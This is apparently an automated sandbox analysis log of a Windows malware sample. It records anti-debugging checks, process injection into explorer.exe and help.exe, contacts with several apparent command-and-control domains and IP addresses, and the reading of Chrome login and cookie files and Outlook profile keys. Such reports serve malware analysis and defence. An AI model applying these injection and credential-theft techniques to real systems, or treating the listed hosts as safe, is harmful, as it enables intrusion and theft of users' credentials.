Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4C450 mov eax, dword ptr fs:[00000030h] 3_2_00B4C450
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA44B mov eax, dword ptr fs:[00000030h] 3_2_00AEA44B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE35A1 mov eax, dword ptr fs:[00000030h] 3_2_00AE35A1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h] 3_2_00B805AC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B805AC mov eax, dword ptr fs:[00000030h] 3_2_00B805AC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00AE1DB5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00AE1DB5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00AE1DB5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB2D8A mov eax, dword ptr fs:[00000030h] 3_2_00AB2D8A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE2581 mov eax, dword ptr fs:[00000030h] 3_2_00AE2581
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 3_2_00AEFD9B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEFD9B mov eax, dword ptr fs:[00000030h] 3_2_00AEFD9B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B68DF1 mov eax, dword ptr fs:[00000030h] 3_2_00B68DF1
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00ACD5E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00ACD5E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00B7FDE2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B36DC9 mov eax, dword ptr fs:[00000030h] 3_2_00B36DC9
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B3A537 mov eax, dword ptr fs:[00000030h] 3_2_00B3A537
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88D34 mov eax, dword ptr fs:[00000030h] 3_2_00B88D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7E539 mov eax, dword ptr fs:[00000030h] 3_2_00B7E539
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 3_2_00AE4D3B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 3_2_00AE4D3B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE4D3B mov eax, dword ptr fs:[00000030h] 3_2_00AE4D3B
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC3D34 mov eax, dword ptr fs:[00000030h] 3_2_00AC3D34
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABAD30 mov eax, dword ptr fs:[00000030h] 3_2_00ABAD30
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h] 3_2_00ADC577
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADC577 mov eax, dword ptr fs:[00000030h] 3_2_00ADC577
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF3D43 mov eax, dword ptr fs:[00000030h] 3_2_00AF3D43
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B33540 mov eax, dword ptr fs:[00000030h] 3_2_00B33540
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B63D40 mov eax, dword ptr fs:[00000030h] 3_2_00B63D40
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AD7D50 mov eax, dword ptr fs:[00000030h] 3_2_00AD7D50
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B346A7 mov eax, dword ptr fs:[00000030h] 3_2_00B346A7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B80EA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B80EA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B80EA5 mov eax, dword ptr fs:[00000030h] 3_2_00B80EA5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4FE87 mov eax, dword ptr fs:[00000030h] 3_2_00B4FE87
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE16E0 mov ecx, dword ptr fs:[00000030h] 3_2_00AE16E0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC76E2 mov eax, dword ptr fs:[00000030h] 3_2_00AC76E2
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE36CC mov eax, dword ptr fs:[00000030h] 3_2_00AE36CC
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF8EC7 mov eax, dword ptr fs:[00000030h] 3_2_00AF8EC7
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88ED6 mov eax, dword ptr fs:[00000030h] 3_2_00B88ED6
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6FEC0 mov eax, dword ptr fs:[00000030h] 3_2_00B6FEC0
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B6FE3F mov eax, dword ptr fs:[00000030h] 3_2_00B6FE3F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABE620 mov eax, dword ptr fs:[00000030h] 3_2_00ABE620
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h] 3_2_00ABC600
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h] 3_2_00ABC600
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ABC600 mov eax, dword ptr fs:[00000030h] 3_2_00ABC600
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AE8E00 mov eax, dword ptr fs:[00000030h] 3_2_00AE8E00
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h] 3_2_00AEA61C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA61C mov eax, dword ptr fs:[00000030h] 3_2_00AEA61C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B71608 mov eax, dword ptr fs:[00000030h] 3_2_00B71608
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC766D mov eax, dword ptr fs:[00000030h] 3_2_00AC766D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADAE73 mov eax, dword ptr fs:[00000030h] 3_2_00ADAE73
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC7E41 mov eax, dword ptr fs:[00000030h] 3_2_00AC7E41
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 3_2_00B7AE44
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B7AE44 mov eax, dword ptr fs:[00000030h] 3_2_00B7AE44
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h] 3_2_00B37794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h] 3_2_00B37794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B37794 mov eax, dword ptr fs:[00000030h] 3_2_00B37794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AC8794 mov eax, dword ptr fs:[00000030h] 3_2_00AC8794
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AF37F5 mov eax, dword ptr fs:[00000030h] 3_2_00AF37F5
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h] 3_2_00AB4F2E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AB4F2E mov eax, dword ptr fs:[00000030h] 3_2_00AB4F2E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEE730 mov eax, dword ptr fs:[00000030h] 3_2_00AEE730
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h] 3_2_00AEA70E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00AEA70E mov eax, dword ptr fs:[00000030h] 3_2_00AEA70E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h] 3_2_00B4FF10
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B4FF10 mov eax, dword ptr fs:[00000030h] 3_2_00B4FF10
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h] 3_2_00B8070D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B8070D mov eax, dword ptr fs:[00000030h] 3_2_00B8070D
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ADF716 mov eax, dword ptr fs:[00000030h] 3_2_00ADF716
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACFF60 mov eax, dword ptr fs:[00000030h] 3_2_00ACFF60
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00B88F6A mov eax, dword ptr fs:[00000030h] 3_2_00B88F6A
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_00ACEF40 mov eax, dword ptr fs:[00000030h] 3_2_00ACEF40
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 3_2_0040C317 LdrLoadDll, 3_2_0040C317
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AB9E SetUnhandledExceptionFilter, 1_2_0040AB9E
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AE6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_0040AE6C
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040AA3F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040AA3F
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040F790 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040F790

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Domain query: www.patrickguarte.com
Source: C:\Windows\explorer.exe Network Connect: 155.159.61.221 80
Source: C:\Windows\explorer.exe Domain query: www.eufidelizo.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.35.86 80
Source: C:\Windows\explorer.exe Domain query: www.lyonfinancialusa.com
Source: C:\Windows\explorer.exe Domain query: www.afterdarksocial.club
Source: C:\Windows\explorer.exe Domain query: www.lopezmodeling.com
Source: C:\Windows\explorer.exe Network Connect: 192.185.217.47 80
Source: C:\Windows\explorer.exe Network Connect: 206.233.197.135 80
Source: C:\Windows\explorer.exe Network Connect: 154.22.100.62 80
Source: C:\Windows\explorer.exe Network Connect: 162.214.129.149 80
Source: C:\Windows\explorer.exe Domain query: www.foxwhistle.com
Source: C:\Windows\explorer.exe Network Connect: 2.57.90.16 80
Source: C:\Windows\explorer.exe Domain query: www.brennancorps.info
Source: C:\Windows\explorer.exe Domain query: www.19t221013d.tokyo
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: 110000
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Thread register set: target process: 3528
Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3528
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Process created: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe "C:\Users\user\AppData\Local\Temp\hvbvmxm.exe" C:\Users\user\AppData\Local\Temp\ijamguwvje.h
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.318601390.0000000005C70000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.313026823.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.360055157.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.341089445.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000004.00000000.313440490.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.341395236.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.360349576.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040ACAB cpuid 1_2_0040ACAB
Source: C:\Users\user\AppData\Local\Temp\hvbvmxm.exe Code function: 1_2_0040A928 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_0040A928
Source: C:\Users\user\Desktop\Lc8xQv8iZY.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Stealing of Sensitive Information

Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.hvbvmxm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.385960005.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.353715977.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568390844.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.568316286.0000000002D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.376694506.000000000D6C1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.386021250.00000000005D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567455523.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY